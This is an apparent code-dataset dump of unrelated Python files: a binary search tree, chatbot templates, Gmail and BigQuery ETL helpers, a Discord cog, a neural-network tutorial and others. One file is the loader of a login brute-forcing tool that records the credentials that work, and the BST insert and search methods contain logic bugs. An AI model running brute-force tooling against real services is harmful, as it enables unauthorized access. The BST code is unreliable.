self._root\n while True:\n if data < current.getValue():\n if not current.getLeft():\n current = current.getLeft()\n else:\n current.setLeft(newNode)\n return\n else: # elif data > current.getValue():\n if not current.getRight():\n current = current.getRight()\n else:\n current.setRight(newNode)\n return\n\n def exist(self, data):\n if self.isEmpty():\n return False\n current = self._root\n while current:\n if data == current.getValue():\n return True\n elif data < current.getValue():\n current = current.getLeft()\n else: # data > current.getValue():\n current = current.getRight()\n return False\n\n def existR(self, data):\n if self.isEmpty():\n return False\n else:\n self.existRecursive(data, self._root)\n\n def existRecursive(self, data, current):\n if data == current.getValue():\n return True\n elif data < current.getValue():\n if not current.getLeft():\n return False\n else:\n return self.existRecursive(data, current.getLeft())\n else:\n if not current.getRight():\n return False\n else:\n return self.existRecursive(data, current.getRight())\n\n def print(self):\n # traverse from top to its right subtree then left for every node\n if self.isEmpty():\n print(\"Empty\")\n return\n stack = [self._root]\n print(\"{0:<10}{1:<10}{2:<10}\".format(\"Node.left\", \"Node.data\",\n \"Node.right\"))\n while len(stack) > 0:\n current = stack.pop()\n print(current)\n if current.getLeft():\n stack.append(current.getLeft())\n if current.getRight():\n stack.append(current.getRight())\n\n # traverse the nodes in a seuqence such that the nodes can form the same 
tree\n # with the same sequence\n def pre_order_traversal(self, current):\n res = []\n if current:\n res.append(current.getValue())\n res += self.pre_order_traversal(current.getLeft())\n res += self.pre_order_traversal(current.getRight())\n return res\n\n # traverse the nodes in a sorted manner\n def in_order_traversal(self, current):\n res = []\n if current:\n res += self.in_order_traversal(current.getLeft())\n res.append(current)\n res += self.in_order_traversal(current.getRight())\n return res\n\n # traverse the nodes from bottom level, from left to right\n def post_order_traversal(self, current):\n res = []\n if current:\n res += self.post_order_traversal(current.getLeft())\n res += self.post_order_traversal(current.getRight())\n res.append(current)\n return res\n","sub_path":"python/python_lesson/5_6/bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"408328688","text":"class Buttons(object):\n def __init__(self, text, buttons):\n self.type = 'template'\n self.payload = {\n 'template_type': 'button',\n 'text': text,\n 'buttons': Buttons.convert_shortcut_buttons(buttons)\n }\n\n @staticmethod\n def convert_shortcut_buttons(items):\n \"\"\"\n support shortcut buttons [{'type':'web_url', 'title':'open web url', 'value':'https://~~'}]\n \"\"\"\n if items is not None and isinstance(items, list):\n result = []\n for item in items:\n if isinstance(item, BaseButton):\n result.append(item)\n elif isinstance(item, dict):\n if item.get('type') in ['web_url', 'postback', 'phone_number']:\n type = item.get('type')\n title = item.get('title')\n value = item.get('value', item.get('url', item.get('payload')))\n\n if type == 'web_url':\n result.append(ButtonWeb(title=title, url=value))\n elif type == 'postback':\n result.append(ButtonPostBack(title=title, payload=value))\n elif type == 'phone_number':\n result.append(ButtonPhoneNumber(title=title, payload=value))\n\n else:\n raise ValueError('Invalid button type')\n else:\n raise ValueError('Invalid buttons variables')\n return result\n else:\n return items\n\nclass BaseButton(object):\n pass\n\nclass ButtonWeb(BaseButton):\n def __init__(self, title, url):\n self.type = 'web_url'\n self.title = title\n self.url = url\n\nclass ButtonPostBack(BaseButton):\n def __init__(self, title, payload):\n self.type = 'postback'\n self.title = title\n self.payload = payload\n\n\nclass ButtonPhoneNumber(BaseButton):\n def __init__(self, title, payload):\n self.type = 'phone_number'\n self.title = title\n self.payload = payload\n\nclass Generic(object):\n def __init__(self, elements):\n self.type = 'template'\n self.payload = {\n 'template_type': 'generic',\n 'elements': elements\n }\n\n\nclass GenericElement(object):\n def __init__(self, title, subtitle=None, item_url=None, image_url=None, buttons=None):\n self.title = title\n self.subtitle = subtitle\n self.item_url = item_url\n self.image_url = image_url\n self.buttons = Buttons.convert_shortcut_buttons(buttons)","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"506406065","text":"import json\nimport numpy as np\nimport pandas as pd\n\nimport pickle\nimport os.path\nfrom googleapiclient.discovery import build\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\n\nfrom apiclient import 
discovery\nfrom apiclient import errors\nfrom httplib2 import Http\n\nfrom google.oauth2 import service_account\nfrom google.cloud import bigquery\n\nimport base64\nfrom email.mime.audio import MIMEAudio\nfrom email.mime.base import MIMEBase\nfrom email.mime.image import MIMEImage\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nimport mimetypes\nimport os\n\nfrom apiclient import errors\n\n# ---------------------------------------------------------------------------- #\n\n# SCHEMA Functions\n\ndef load_json(path):\n with open(path) as fil:\n return json.load(fil)\n\ndef create_dF_from_schema(endpoint):\n\n schema = load_json(\"schemas/\" + endpoint + \".json\")\n\n dF = pd.DataFrame(columns=list(schema.keys()))\n\n return dF\n\ndef update_dF_dtypes_from_schema(endpoint, dF):\n\n schema = load_json(\"schemas/\" + endpoint + \".json\")\n\n for col, dtype in schema.items():\n\n dtype = dtype['type'][1]\n if dtype == 'string' or dtype == 'boolean':\n continue\n if dtype == 'integer':\n dF[col] = pd.to_numeric(dF[col], downcast='integer')\n if dtype == 'float':\n dF[col] = pd.to_numeric(dF[col], downcast='float')\n if dtype == 'datetime':\n dF[col] = pd.to_datetime(dF[col])\n\n return dF\n\n# ---------------------------------------------------------------------------- #\n\n# BIGQUERY Functions\n\ndef bigquery_upload(service_cred, project_name, dataset_name, table_name, dF):\n\n credentials = service_account.Credentials.from_service_account_file(\n service_cred)\n\n # load dataframe into BigQuery\n client = bigquery.Client(project=project_name, credentials=credentials)\n dataset_ref = client.dataset(dataset_name)\n table_ref = dataset_ref.table(table_name)\n\n client.load_table_from_dataframe(dF, table_ref).result()\n\n# ---------------------------------------------------------------------------- #\n\n# GMAIL Functions\n\ndef google_auth(cred_path):\n\n SCOPES = [\n 'https://www.googleapis.com/auth/gmail.send',\n 'https://www.googleapis.com/auth/webmasters.readonly'\n ]\n\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists(cred_path + 'token.pickle'):\n with open(cred_path + 'token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n cred_path + 'credentials_2.json', SCOPES)\n creds = flow.run_local_server()\n # Save the credentials for the next run\n with open(cred_path + 'token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n GMAIL = discovery.build('gmail', 'v1', credentials=creds, cache_discovery=False)\n WEBMASTER = discovery.build('webmasters', 'v3', credentials=creds, cache_discovery=False)\n return {'gmail': GMAIL, 'search_console': WEBMASTER}\n\ndef SendMessageWithAttachment(cred_path, sender, to, subject, message_text, file_dir, filename):\n\n GMAIL = google_auth(cred_path)['gmail']\n\n \"\"\"Create a message for an email.\n\n Args:\n sender: Email address of the sender.\n to: Email address of the receiver.\n subject: The subject of the email message.\n message_text: The text of the email message.\n file_dir: The directory containing the file to be attached.\n filename: The name of the file to be attached.\n\n Returns:\n An object containing a 
base64url encoded email object.\n \"\"\"\n message = MIMEMultipart()\n message['to'] = to\n message['from'] = sender\n message['subject'] = subject\n\n msg = MIMEText(message_text)\n message.attach(msg)\n\n path = os.path.join(file_dir, filename)\n content_type, encoding = mimetypes.guess_type(path)\n\n if content_type is None or encoding is not None:\n content_type = 'application/octet-stream'\n main_type, sub_type = content_type.split('/', 1)\n if main_type == 'text':\n fp = open(path, 'rb')\n msg = MIMEText(fp.read(), _subtype=sub_type, _charset='utf-8')\n fp.close()\n elif main_type == 'image':\n fp = open(path, 'rb')\n msg = MIMEImage(fp.read(), _subtype=sub_type, _charset='utf-8')\n fp.close()\n elif main_type == 'audio':\n fp = open(path, 'rb')\n msg = MIMEAudio(fp.read(), _subtype=sub_type, _charset='utf-8')\n fp.close()\n else:\n fp = open(path, 'rb')\n msg = MIMEBase(main_type, sub_type)\n msg.set_payload(fp.read())\n fp.close()\n\n msg.add_header('Content-Disposition', 'attachment', filename=filename)\n message.attach(msg)\n\n b64_bytes = base64.urlsafe_b64encode(message.as_bytes())\n b64_string = b64_bytes.decode()\n body = {'raw': b64_string}\n\n GMAIL.users().messages().send(userId='me', body=body).execute()\n\n return {'raw': body}\n\n# ---------------------------------------------------------------------------- #\n\n# Flatten JSON\n\ndef flatten_json(y):\n out = {}\n\n def flatten(x, name=''):\n if type(x) is dict:\n for a in x:\n flatten(x[a], name + a + '_')\n elif type(x) is list:\n i = 0\n for a in x:\n flatten(a, name + str(i) + '_')\n i += 1\n else:\n out[name[:-1]] = x\n\n flatten(y)\n return out\n\n# ---------------------------------------------------------------------------- #\n","sub_path":"etl_tools.py","file_name":"etl_tools.py","file_ext":"py","file_size_in_byte":5960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"168627287","text":"\"\"\"\nRun after running fullcolombia6.py\n\"\"\"\n\nfrom optima import dcp, plotresults, loadobj, Multiresultset, comparepars, plotpars\nfilename = 'files/colombia-20160531.prj'\n\ntmp = loadobj(filename)\nQ = dcp(tmp)\nQ.copyparset('default','curr')\nQ.copyparset('default','optim')\n\norigpars = Q.parsets['default'].pars[0]\ncurrpars = Q.results['optim-minoutcome_final_default'].parset[0].pars[0]\noptpars = Q.results['optim-minoutcome_final_default'].parset[1].pars[0]\n\nfor bp,bypop in enumerate(['total','bypop']):\n for key in ['optim-minoutcome_final_default', 'optim-minoutcome_final_KPeffiency']:\n tmp.results[key].export(bypop=bp, filestem=key+'-'+bypop)\n\nQ.parsets['curr'].pars[0] = currpars\nQ.parsets['optim'].pars[0] = optpars\n\n# Tests\n#copypars = ['condcom']\n#finepars = ['hivtest','condcas','numtx','numpmtct','sharing']\n#for p in copypars:\n# currpars[p] = origpars[p]\n# optpars[p] = origpars[p]\n\nQ.runsim(name='default')\nQ.runsim(name='curr')\nQ.runsim(name='optim')\n\ncomparepars(pars1=origpars, pars2=currpars)\nQ.results['all'] = Multiresultset([Q.results['parset-default'], Q.results['parset-curr'], Q.results['parset-optim']])\nplotresults(Q.results['all'])\n#plotpars([origpars, currpars, optpars])\n\nprint('Done')","sub_path":"colombia/troubleshootcolombia.py","file_name":"troubleshootcolombia.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"149207461","text":"# -*- coding: utf-8 -*-\n\nfrom discord.ext import commands\nimport asyncio\nimport 
discord\n\n\nclass fuckingHemlock(commands.Cog):\n \"\"\"\n\n Run tasks to keep welcome channel at top. For some reason Hemlock\n moves the last used ongoing raids channel as default.\n\n \"\"\"\n def __init__(self, bot):\n self.logger = bot.logger\n self.logger.info(f\"Loaded {self.__class__.__name__} cog\")\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_guild_channel_create(self, channel):\n isRaidCat = discord.utils.find(\n lambda c: c.name.startswith(\"\\U0001f5bc\"), channel.category.channels\n )\n if isRaidCat:\n welcomeChannel = discord.utils.get(\n self.bot.get_all_channels(),\n guild__id=339074243838869504,\n name=\"welcome\",\n )\n await asyncio.sleep(1)\n await welcomeChannel.edit(position=0)\n\n @commands.Cog.listener()\n async def on_guild_channel_delete(self, channel):\n isRaidCat = discord.utils.find(\n lambda c: c.name.startswith(\"\\U0001f5bc\"), channel.category.channels\n )\n if isRaidCat:\n welcomeChannel = discord.utils.get(\n self.bot.get_all_channels(),\n guild__id=339074243838869504,\n name=\"welcome\",\n )\n await asyncio.sleep(1)\n await welcomeChannel.edit(position=0)\n\n\ndef setup(bot):\n bot.add_cog(fuckingHemlock(bot))\n","sub_path":"cogs/fuckinghemlock.py","file_name":"fuckinghemlock.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"124708396","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n@Author: reber\n@Mail: reber0ask@qq.com\n@Date: 2019-09-25 23:57:35\n@LastEditTime: 2019-12-24 18:32:05\n'''\n\nimport time\nimport importlib\nfrom libs.mylog import MyLog\nfrom config import log_file_path\nfrom config import log_level\n\n\nlog_file = log_file_path.joinpath(\"{}.log\".format(time.strftime(\"%Y-%m-%d\", time.localtime())))\n\nclass LoadModule(object):\n \"\"\"LoadModule\"\"\"\n def __init__(self, args):\n super(LoadModule, self).__init__()\n self.service_type = args.get(\"service_type\")\n self.thread_num = args.get(\"thread_num\")\n self.timeout = args.get(\"timeout\")\n self.logger = MyLog(loglevel=log_level, logger_name=self.service_type, logfile=log_file)\n\n self.result = list()\n self.modules = list()\n\n def hook_msg(self, msg):\n status,host,port,user,pwd = msg\n if status:\n self.logger.error(\"[*] {} {} {} {}\".format(host, port, user, pwd))\n self.result.append((host, port, user, pwd))\n else:\n self.logger.info(\"[-] {} {} {} {}\".format(host, port, user, pwd))\n\n def load_module(self):\n \"根据 service_type 加载对应的模块\"\n fname = self.service_type\n self.logger.info(\"Start brute {} ...\".format(fname))\n module = importlib.import_module(\".\"+fname, package=\"modules\")\n module.hook_msg = self.hook_msg\n\n return module.bruter\n \n def start_brute(self,hpup):\n bruter = self.load_module()\n bruter(hpup, self.thread_num, self.timeout).run()\n\n return self.result\n","sub_path":"libs/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"462063188","text":"# -*- coding: utf-8 -*-\n'''\nAuthor: Rui Wang\nDate: 2021-01-27 22:56:05\nLastModifiedBy: Rui Wang\nLastEditTime: 2021-01-28 19:08:43\nEmail: wangru25@msu.edu\nFilePath: /ANN/ANN.py\nDescription: \n'''\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt \n\ndef read_dataset(feature_file, label_file):\n ''' Read data set in *.csv to data frame in Pandas'''\n df_X = pd.read_csv(feature_file)\n df_y = pd.read_csv(label_file)\n 
X = df_X.values # convert values in dataframe to numpy array (features)\n y = df_y.values # convert values in dataframe to numpy array (label)\n return X, y\n\n\ndef normalize_features(X_train, X_test):\n from sklearn.preprocessing import StandardScaler #import libaray\n scaler = StandardScaler() # call an object function\n scaler.fit(X_train) # calculate mean, std in X_train\n X_train_norm = scaler.transform(X_train) # apply normalization on X_train\n X_test_norm = scaler.transform(X_test) # we use the same normalization on X_test\n return X_train_norm, X_test_norm\n\n\ndef one_hot_encoder(y_train, y_test):\n ''' convert label to a vector under one-hot-code fashion '''\n from sklearn import preprocessing\n lb = preprocessing.LabelBinarizer()\n lb.fit(y_train)\n y_train_ohe = lb.transform(y_train)\n y_test_ohe = lb.transform(y_test)\n return y_train_ohe, y_test_ohe\n\n\nclass onelayer_NN:\n def __init__(self, X, y, hidden_layer_nn=100, lr=0.01):\n self.X = X # features\n self.y = y # labels (targets) in one-hot-encoder\n self.hidden_layer_nn = hidden_layer_nn # number of neuron in the hidden layer\n # In this example, we only consider 1 hidden layer\n self.lr = lr # learning rate\n # Initialize weights\n self.nn = X.shape[1] # number of neurons in the inpute layer\n self.W1 = np.random.randn(self.nn, hidden_layer_nn) / np.sqrt(self.nn)\n self.b1 = np.zeros((1, hidden_layer_nn)) # double parentheses\n self.output_layer_nn = y.shape[1]\n self.W2 = np.random.randn(hidden_layer_nn, self.output_layer_nn) / np.sqrt(hidden_layer_nn)\n self.b2 = np.zeros((1, self.output_layer_nn))\n \n \n def feed_forward(self):\n # hidden layer\n ## z_1 = xW_1 + b_1\n self.z1 = np.dot(self.X, self.W1) + self.b1\n ## activation function : f_1 = \\tanh(z_1)\n self.f1 = np.tanh(self.z1)\n # output layer\n ## z_2 = f_1W_2 + b_2\n self.z2 = np.dot(self.f1, self.W2) + self.b2 \n #\\hat{y} = softmax}(z_2)$\n self.y_hat = softmax(self.z2)\n \n def back_propagation(self):\n # $d_2 = \\hat{y}-y$\n d2 = self.y_hat - self.y\n # dL/dW2 = f_1^T d_2\n dW2 = np.dot(self.f1.T, d2)\n # dL/b_2 = d_2.dot(1)$\n db2 = np.sum(d2, axis=0, keepdims=True)\n # axis =0 : sum along the vertical axis\n # d_1 = (1-f^2_1)(\\hat{y}-y)W_2^T\n d1 = (1-self.f1*self.f1)*(d2.dot((self.W2).T))\n # dL/dW_1} = x^T d_1\n dW1 = np.dot((self.X).T, d1)\n # dL/db_1 = d_1\n db1 = np.sum(d1, axis=0, keepdims=True)\n \n # Update the gradident descent\n self.W1 = self.W1 - self.lr * dW1\n self.b1 = self.b1 - self.lr * db1\n self.W2 = self.W2 - self.lr * dW2\n self.b2 = self.b2 - self.lr * db2\n \n def cross_entropy_loss(self):\n # $L = -\\sum_n\\sum_{i\\in C} y_{n, i}\\log(\\hat{y}_{n, i})$\n # calculate y_hat\n self.feed_forward()\n self.loss = -np.sum(self.y*np.log(self.y_hat + 1e-6))\n \n def predict(self, X_test):\n # Use feed forward to calculat y_hat_test\n # hidden layer\n ## z_1 = xW_1 + b_1\n z1 = np.dot(X_test, self.W1) + self.b1\n ## activation function : f_1 = \\tanh(z_1)\n f1 = np.tanh(z1)\n # output layer\n ## z_2 = f_1W_2 + b_2\n z2 = np.dot(f1, self.W2) + self.b2 \n #\\hat{y} = softmax}(z_2)$\n y_hat_test = softmax(z2)\n # the rest is similar to the logistic regression\n labels = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n num_test_samples = X_test.shape[0]\n # find which index gives us the highest probability\n ypred = np.zeros(num_test_samples, dtype=int) \n for i in range(num_test_samples):\n ypred[i] = labels[np.argmax(y_hat_test[i,:])]\n return ypred\n \ndef softmax(z):\n exp_value = np.exp(z-np.amax(z, axis=1, keepdims=True)) # for stablility\n # 
keepdims = True means that the output's dimension is the same as of z\n softmax_scores = exp_value / np.sum(exp_value, axis=1, keepdims=True)\n return softmax_scores\n\ndef accuracy(ypred, yexact):\n p = np.array(ypred == yexact, dtype = int)\n return np.sum(p)/float(len(yexact))\n \n# main\nX_train, y_train = read_dataset('Digits_X_train.csv', 'Digits_y_train.csv')\nX_test, y_test = read_dataset('Digits_X_test.csv', 'Digits_y_test.csv')\nX_train_norm, X_test_norm = normalize_features(X_train, X_test)\ny_train_ohe, y_test_ohe = one_hot_encoder(y_train, y_test)\n# \nmyNN = onelayer_NN(X_train_norm, y_train_ohe, hidden_layer_nn=200, lr=0.1) \nepoch_num = 200\nfor i in range(epoch_num):\n myNN.feed_forward()\n myNN.back_propagation()\n myNN.cross_entropy_loss()\n if ((i+1)%20 == 0):\n print('epoch = %d, current loss = %.5f' % (i+1, myNN.loss)) \n \ny_pred = myNN.predict(X_test_norm)\nprint('Accuracy of our model ', accuracy(y_pred, y_test.ravel()))","sub_path":"Deeplearning_tutorial/ANN/ANN.py","file_name":"ANN.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"475483157","text":"cards = [{\"name\":\"尹天\",\"age\":20},{\"name\":\"豪哥\",\"age\":20},{\"name\":\"崔健\",\"age\":18}]\n\nfor i in cards:\n\tfor k,v in i.items():\n\t\tprint(\"%s:%s\"%(k,v))\n\n\nd = {}\nd[\"name\"] = \"xiaoyuan\"\ncards.append(d)\nprint(cards)\t\n","sub_path":"00源哥代码.py/3-test/11day/8-列表和字典嵌套.py","file_name":"8-列表和字典嵌套.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"217576139","text":"import os\nimport json\nimport argparse\nimport configparser\nimport warnings\nimport datetime\nfrom ge2e import *\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\n# arguments\n# ckpt example : '/path/to/your/ckpt/cp-{:06d}.ckpt'\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--mode\")\nparser.add_argument(\"--ckpt\",default='/mnt/data1/sunkist/data/sv_ckpt/kor_8k/cp-{:06d}.ckpt')\nparser.add_argument(\"--infer_json\",default='')\nparser.add_argument(\"--wavdir\",default='')\nparser.add_argument(\"--emb_savedir\",default='/mnt/data1/sunkist/data/kor_cln_test_emb')\nargs = parser.parse_args()\n\ndef get_data_list(data_type, root_dir=''):\n datalist = []\n if data_type == \"wav\":\n if root_dir:\n datalist = glob.glob(root_dir+'/*wav')\n elif data_type == \"mel\":\n if root_dir:\n datalist = glob.glob(root_dir+'/*npy') #?\n elif data_type == \"testset\":\n with open(os.path.join(os.path.dirname(__file__),'path_index_test.json'), 'r') as f:\n utts = json.load(f)['utts']\n for spk in utts.keys():\n datalist.extend(utts[spk])\n return datalist\n\nif __name__ == \"__main__\":\n mode = args.mode\n ckpt_to_load = args.ckpt\n\n # config\n CONFIG_FILE = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir, 'config', 'config.json'))\n with open(CONFIG_FILE, 'rb') as fid:\n config = json.load(fid)\n # config 읽어와서 후처리\n config[\"write_wavname\"] = bool(config[\"write_wavname\"])\n config[\"random_segment\"] = bool(config[\"random_segment\"])\n config[\"multiprocessing\"] = bool(config[\"multiprocessing\"])\n config[\"preprocess_multiprocessing\"] = bool(config[\"preprocess_multiprocessing\"])\n\n if mode == \"training\":\n sv = Speaker_verification(config,\"train\")\n elif mode == \"inference\":\n sv = Speaker_verification(config,\"infer\")\n elif mode == \"evaluation\":\n sv = 
Speaker_verification(config,\"infer\")\n    elif mode == \"exporting\":\n        sv = Speaker_verification(config,\"export\")\n\n\n    if mode == \"training\":\n        sv._run()\n    elif mode == \"inference\":\n        emb_savedir= args.emb_savedir\n\n        if not os.path.exists(emb_savedir):\n            os.makedirs(emb_savedir)\n\n        wavpath_list = get_data_list(\"wav\", args.wavdir)\n        # process wav & infer\n        sv._process_and_infer(config,emb_savedir,ckpt_to_load,wavpath_list)\n\n    elif mode == \"evaluation\":\n        evaluation_info = []\n        emb_savedir= args.emb_savedir\n\n        if not os.path.exists(emb_savedir):\n            os.makedirs(emb_savedir)\n\n        mellist = get_data_list(\"testset\")\n\n        for i in range(79,6060):\n            each_checkpoint = ckpt_to_load.format(i)\n            # process mel & infer\n            timenow, num_epoch, eer = sv._infer_mels(config,emb_savedir,each_checkpoint,mellist)\n            evaluation_info.append([timenow, num_epoch, eer])\n        \n        for item in evaluation_info:\n            print(f\"[{item[0]}] EPOCH : {item[1]}, EER : {item[2]}\")\n\n    elif mode == \"exporting\":\n        sv._export(ckpt_to_load)\n","sub_path":"Speaker_Verification/src/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"635643515","text":"#!/usr/bin/env python \n# -*- coding:utf-8 _*- \n# Author: Wengs\n# Time : 2/20/2019 10:06 PM \n# File : user.py \n# IDE : PyCharm\n\nuser_0 = {\n    'username': 'wengsway',\n    'first': 'quan',\n    'last': 'weng'\n}\nfor key, value in user_0.items():\n    print(\"\\nkey: \" + key)\n    print(\"Value: \" + value)\n","sub_path":"chapter_6/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"345519726","text":"import requests\nimport smtplib\n\nfrom twilio.rest import TwilioRestClient\nfrom bs4 import BeautifulSoup\n\n\naccountSID = '***'\nauthToken = '***'\ntwilioCli = TwilioRestClient(accountSID, authToken)\nmyTwilioNumber = '***'\nmyCellPhone = '***'\n\n\n\nr = requests.get('https://www.usask.ca/culinaryservices/foodmenu/')\n\nsoup = BeautifulSoup(r.content, 'html.parser')\n\nmenu = soup.get_text()\n\nPerogies = \"Perogies and Onions\"\n\nif (menu.find(Perogies) != -1):\n\tmessage = twilioCli.messages.create(body='There are Perogies today!', from_=myTwilioNumber, to=myCellPhone)\n\n\n","sub_path":"perogies.py","file_name":"perogies.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"570309097","text":"board = [list(map(int, input().split())) for _ in range(10)]\ni = j = 1\n\nwhile True:\n    # if the current cell holds 2, mark it with 9 and stop\n    if board[i][j] == 2:\n        board[i][j] = 9\n        break\n    # if the current cell is on the border, stop\n    elif i == 9 or j == 9:\n        break\n\n    # otherwise mark the current cell with 9\n    board[i][j] = 9\n    # then inspect the cell to the right: 0 -> move right, 1 -> move down,\n    # 2 -> mark that cell with 9 and stop\n    if board[i][j + 1] == 0:\n        j += 1\n    elif board[i][j + 1] == 1:\n        i += 1\n    else:\n        board[i][j + 1] = 9\n        break\n\nfor i in range(10):\n    for j in range(10):\n        print(board[i][j], end=' ')\n    print()","sub_path":"6081~6098/6098.py","file_name":"6098.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"270265124","text":"from bitpermissions import Permissions, PermissionException\nimport inspect\n\n\ndef get_props(object_):\n    \"\"\"\n    :return: List of properties to test\n    \"\"\"\n    # get properties\n    prop_list = inspect.getmembers(object_, 
predicate=inspect.isdatadescriptor)\n    # remove weakref and permissions\n    remove_list = ['__weakref__', 'permissions']\n    property_list = []\n    for prop in prop_list:\n        # compare the property name, not the object itself\n        if prop[0] not in remove_list:\n            property_list.append(prop[0])\n    return property_list\n\n\nsamurai = ['samurai', 'jack', 'back', 'to', 'the', 'past']\n\n\ndef test_negative_one_input():\n    all_perms = Permissions(samurai, perm_rights=-1)\n    assert all_perms.permissions == 2**all_perms._num_of_rights - 1\n\n\ndef test_remove_all():\n    all_perms = Permissions(samurai, perm_rights=-1)\n    for right_name in get_props(all_perms):\n        # each right must start enabled, then actually be cleared on the object\n        assert getattr(all_perms, right_name)\n        setattr(all_perms, right_name, False)\n        assert not getattr(all_perms, right_name)\n\n\ndef test_add_all():\n    no_perms = Permissions(samurai, perm_rights=0)\n    for right_name in get_props(no_perms):\n        # each right must start disabled, then actually be set on the object\n        assert not getattr(no_perms, right_name)\n        setattr(no_perms, right_name, True)\n        assert getattr(no_perms, right_name)\n\n\nclass TestMultipleInstances():\n\n    def test_has_functions(self):\n        self.a = Permissions(['a'], perm_rights=-1)\n        self.b = Permissions(['b'], perm_rights=-1)\n\n        try:\n            self.a.has_a()\n        except AttributeError:\n            raise RuntimeError(\"Instance 'a' doesn't have method 'has_a'.\")\n\n        try:\n            self.a.has_b()\n        except AttributeError:\n            print(\"Instance 'a' doesn't have method 'has_b'\")\n        else:\n            raise RuntimeError(\"Instance 'a' has method 'has_b'\")\n\n    def test_properties(self):\n        try:\n            print(self.a.b)\n        except AttributeError:\n            print(\"'a' instance wasn't affected by 'b' instance\")\n        else:\n            raise RuntimeError(\"'a' instance had 'b' instance's attribute!\")\n\n\nclass TestPerms():\n\n    def test_on_and_off_and_on_and_off_again(self):\n        self.perms = Permissions(samurai, perm_rights=0)\n        self.has_perm = self.perms.__getattribute__('has_' + samurai[0])\n\n        self._on()\n        self._off()\n        self._on()\n        self._off()\n        self._on()\n        self._on()\n        self._off()\n        self._off()\n\n    def _on(self):\n        setattr(self.perms, samurai[0], True)\n        assert getattr(self.perms, samurai[0])\n        self.has_perm()\n\n    def _off(self):\n        setattr(self.perms, samurai[0], False)\n        assert not getattr(self.perms, samurai[0])\n        try:\n            self.has_perm()\n        except PermissionException:\n            print('Correct exception raised')\n        else:\n            raise RuntimeError(\"There was no PermissionException when there should have been!\")\n","sub_path":"tests/permissions_test.py","file_name":"permissions_test.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"65735473","text":"'''\nAuthor: Rosina Savisaar and Liam Abrahams.\nModule that contains generic utility functions that make life a bit easier.\n'''\n\nimport argparse\nimport csv\nimport ftplib\nimport itertools as it\nimport multiprocessing\nimport numpy as np\nimport os\nimport random\nimport re\nimport shutil\nimport subprocess\nimport time\n\ndef blast_all_against_all(db_name, fasta_file_name, output_file_name, blast_db_path):\n    '''\n    Blast all the sequences in a fasta file against each other.\n    '''\n    run_process([\"makeblastdb\", \"-in\", fasta_file_name, \"-out\",\n                 \"{0}/{1}\".format(blast_db_path, db_name),\n                 \"-dbtype\", \"nucl\"])\n    run_process([\"blastn\", \"-task\", \"blastn\", \"-query\", fasta_file_name,\n                 \"-db\", \"{0}/{1}\".format(blast_db_path, db_name),\n                 \"-out\", output_file_name, \"-outfmt\", \"10\", \"-evalue\", \"1e-04\", \"-num_threads\", str(int((os.cpu_count()/2)-1))])\n\ndef calc_eff_p(real_value, sim_values, greater = True):\n    '''\n    
Given an estimate and a series of simulated estimates, calculate an empirical effective p-value.\n    If greater is True, calculate the probability that a value this great or greater would have been observed by chance,\n    otherwise that a value this low or lower would have been observed.\n    For example, if 2 of 99 simulated values are at least as extreme as the real value, p = (2 + 1)/(99 + 1) = 0.03.\n    '''\n    if real_value == None or np.isnan(real_value):\n        return(None)\n    sim_values = [i for i in sim_values if i != None and not np.isnan(i)]\n    if greater:\n        more_extreme = [i for i in sim_values if i >= real_value]\n    else:\n        more_extreme = [i for i in sim_values if i <= real_value]\n    n = len(more_extreme)\n    m = len(sim_values)\n    p = (n + 1)/(m + 1)\n    return(p)\n\ndef create_directory(path):\n    '''\n    Create a new directory if it doesn't already exist\n    '''\n    if not os.path.exists(path):\n        os.makedirs(path, exist_ok=True)\n\ndef create_strict_directory(path):\n    '''\n    Remove the directory if it exists, then create it anew\n    '''\n    if os.path.exists(path):\n        shutil.rmtree(path)\n    